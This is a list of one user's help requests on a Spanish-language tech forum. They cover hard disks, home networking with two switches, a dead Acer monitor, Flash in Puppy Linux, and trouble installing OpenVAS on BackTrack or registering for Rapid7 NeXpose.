el disco duro que lleva es este  Toshiba MK6028GAL sm a ver si me podeis orientar un poco gracias

esta es la pagina de soporte pero no encuentro nada http://www.airissupport.com/SoporteHome2.aspx?Codigo=KIRA%20Series
#37
Foro Libre / google caido?
10 Mayo 2011, 01:24 AM
google caido?  :o no me acordaba que existia yhaoo
#38
error al instalar openvas-server  en bactrack 4 r2


apt-get install openvas-server
Reading package lists... Done
Building dependency tree
Reading state information... Done
Package openvas-server is not available, but is referred to by another package.
This may mean that the package is missing, has been obsoleted, or
is only available from another source
However the following packages replace it:
  openvas-menu
E: Package openvas-server has no installation candidate

como inicio el servidor de openvas?.      en bactrack r1 lo iniciava asi.   openvas-server start
#39
Bugs y Exploits / como registrase en rapit7 NeXpose
10 Diciembre 2010, 23:34 PM
ya se que es una pregunta tonta .es de risa pero no se como registrame en http://www.rapid7.com/vulnerability-scanner.jsp    pongo todos los datos i mi mail xxx@hotmail.com esta bien me pone este error   You have entered in an invalid email/domain. You must enter a valid company email address. Please try again.
#40
Redes / 2 switch en un ruter (solucionado)
2 Diciembre 2010, 17:36 PM
buenas tengo 5 ordenadores en el garage que al router le conectado un switch. en el piso de arriba tengo 2 ordenadores. quiero saber si tirando un cable arriba i poniendo otro switch funcionaria . el ruter es de jazztel
#41
Electrónica / pantalla acer
26 Noviembre 2010, 19:13 PM
buenas tengo 1 pantalla acer (lcd )que le pasa lo mismo se enciende el led verde pero la pantalla se queda negra el pc no es ya que e provado la pantalla en otros pc tiene arreglo? el otro dia tambien me dieron otra pantalla que le pasa lo mismo
#42
Windows / que pasa si no validas windows 7 ?
16 Octubre 2010, 17:49 PM
que pasa si no validas windows 7 ?
#44
GNU/Linux / Aceleración por hardware de Flash
23 Septiembre 2010, 21:29 PM
¿ Cómo desmarco "Aceleración por hardware" de flash player ? no me deja desmarcarlo con el ratón en Puppy Linux

Quiero hacer lo que hacen en este video, pero el mouse no me funciona dentro del recuadro de flash player. tampoco me funciona el mouse cuando quiero subir una foto y le tengo que dar al recuadro "upload"

http://www.youtube.com/watch?v=ZhWQMdX7jjQ

Gracias

#45
Hardware / fallo en la placa?
22 Septiembre 2010, 01:44 AM
resulta que si lo dejo el pc conectado ala corriente i no quito el cable enciende  apagado i con el cable conectado ala corriente enciende sin problemas haora viene el problema lo desconecto de la red electrica i lo vuelvo a conectar no enciende pasado 30 minutos le doi al boton power i tarda 30 minutos a llegarle la corriente ala placa  e cambiado la fuente i nada  pasa lo mismo graciasde antemano